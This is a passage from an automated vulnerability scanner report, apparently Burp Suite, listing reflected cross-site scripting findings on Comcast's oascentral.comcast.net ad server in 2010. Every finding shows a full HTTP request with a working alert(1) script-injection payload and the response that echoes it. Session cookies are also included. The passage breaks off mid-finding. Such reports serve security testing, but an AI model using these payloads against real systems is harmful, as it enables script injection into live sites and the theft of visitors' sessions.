2.107. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ace4"><script>alert(1)</script>ea98919b1f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?8ace4"><script>alert(1)</script>ea98919b1f9=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
ream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1660234141/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&8ace4"><script>alert(1)</script>ea98919b1f9=1" WIDTH=2 HEIGHT=2>

2.108. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0a72"><script>alert(1)</script>f7f7069159a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1443
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/628065419/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.109. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14935"%3be7e5252438c was submitted in the REST URL parameter 4. This input was echoed as 14935";e7e5252438c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net14935"%3be7e5252438c/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1395
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net14935";e7e5252438c/network/202236386/L17/1951116135/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="
...[SNIP]...

2.110. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d17"><script>alert(1)</script>cff26d6cff1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1445
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1983654328/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.111. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171b6"%3b637bcacedc8 was submitted in the REST URL parameter 5. This input was echoed as 171b6";637bcacedc8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network171b6"%3b637bcacedc8/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1395
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network171b6";637bcacedc8/202236386/L17/1178633365/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFla
...[SNIP]...

2.112. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e77"><script>alert(1)</script>bef770f05c3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1443
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/964926435/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.113. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e88e"-alert(1)-"53982542345 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1413
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/196666583/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK
...[SNIP]...

2.114. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a574f"><script>alert(1)</script>34133688c6e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1447
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/L/856912946/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.115. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5a9a"-alert(1)-"e60a8a7472b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1419
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/L/2133113156/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK
...[SNIP]...

2.116. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

